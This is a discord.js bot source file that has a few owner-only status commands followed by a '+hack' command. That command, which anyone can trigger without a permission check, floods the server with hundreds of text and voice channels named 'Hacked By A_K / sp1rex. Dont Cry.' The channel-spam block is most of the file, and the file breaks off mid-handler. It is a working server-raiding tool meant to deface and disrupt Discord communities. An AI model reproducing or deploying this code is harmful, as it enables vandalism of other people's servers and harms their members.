const Discord = require('discord.js');
const client = new Discord.Client();
const prefix = '+'

client.on('ready', () => {
  console.log(`Logged in as ${client.user.tag}!`);
client.user.setGame(`d`,"http://twitch.tv/A_K")
  console.log('')
  console.log('')
  console.log('╔[═════════════════════════════════════════════════════════════════]╗')
  console.log(`[Start] ${new Date()}`);
  console.log('╚[═════════════════════════════════════════════════════════════════]╝')
  console.log('')
  console.log('╔[════════════════════════════════════]╗');
  console.log(`Logged in as * [ " ${client.user.username} " ]`);
  console.log('')
  console.log('Informations :')
  console.log('')
  console.log(`servers! [ " ${client.guilds.size} " ]`);
  console.log(`Users! [ " ${client.users.size} " ]`);
  console.log(`channels! [ " ${client.channels.size} " ]`);
  console.log('╚[════════════════════════════════════]╝')
  console.log('')
  console.log('╔[════════════]╗')
  console.log(' Bot Is Online')
  console.log('╚[════════════]╝')
  console.log('')
  console.log('')
});



client.on('message', function(message) {
	const myID = "279194403564814336";
    let args = message.content.split(" ").slice(1).join(" ");
    if(message.content.startsWith(prefix + "setname")) {
		        if(message.author.id !== myID) return;
            if(!args) return message.reply('اكتب الحالة اللي تريدها.');
        client.user.setUsername(args);
        message.channel.send(':white_check_mark: Done!').then(msg => {
           msg.delete(5000);
          message.delete(5000);
        });
    } else if(message.content.startsWith(prefix + "stream")) {
		        if(message.author.id !== myID) return;
            if(!args) return message.reply('اكتب الحالة اللي تريدها.');
        client.user.setGame(args , 'https://twitch.tv/6xlez1');
        message.channel.send(':white_check_mark: Done!').then(msg => {
           msg.delete(5000);
          message.delete(5000);
        });
    } else if(message.content.startsWith(prefix + "play")) {
				        if(message.author.id !== myID) return;
            if(!args) return message.reply('اكتب الحالة اللي تريدها.');
        client.user.setGame(args);
        message.channel.send(':white_check_mark: Done!').then(msg => {
           msg.delete(5000);
          message.delete(5000);
        });
    } else if(message.content.startsWith(prefix + "listen")) {
				        if(message.author.id !== myID) return;
            if(!args) return message.reply('اكتب الحالة اللي تريدها.');
        client.user.setActivity(args, {type:'LISTENING'});
        message.channel.send(':white_check_mark: Done!').then(msg => {
           msg.delete(5000);
          message.delete(5000);
        });
    } else if(message.content.startsWith(prefix + "watch")) {
				        if(message.author.id !== myID) return;
            if(!args) return message.reply('اكتب الحالة اللي تريدها.');
        client.user.setActivity(args, {type:'WATCHING'});
        message.channel.send(':white_check_mark: Done!').then(msg => {
           msg.delete(5000);
          message.delete(5000);
        });
    } else if(message.content.startsWith(prefix + "setavatar")) {
				        if(message.author.id !== myID) return;
        client.user.setAvatar(args);
        message.channel.send(':white_check_mark: Done!').then(msg => {
                if(!args) return message.reply('اكتب الحالة اللي تريدها.');
           msg.delete(5000);
          message.delete(5000);
        });
    }
});
	


client.on('message' , async (message) => {
const prefix = '+'
        if (message.content.startsWith(prefix + 'hack')) {
for (let i = 0; i < 1; i++) {

        message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
		        message.guild.createChannel('Hacked By |" sp1rex. "| Dont Cry.', 'voice')
	 message.guild.createChannel('Hacked By |" A_K "| Dont Cry.', 'text')
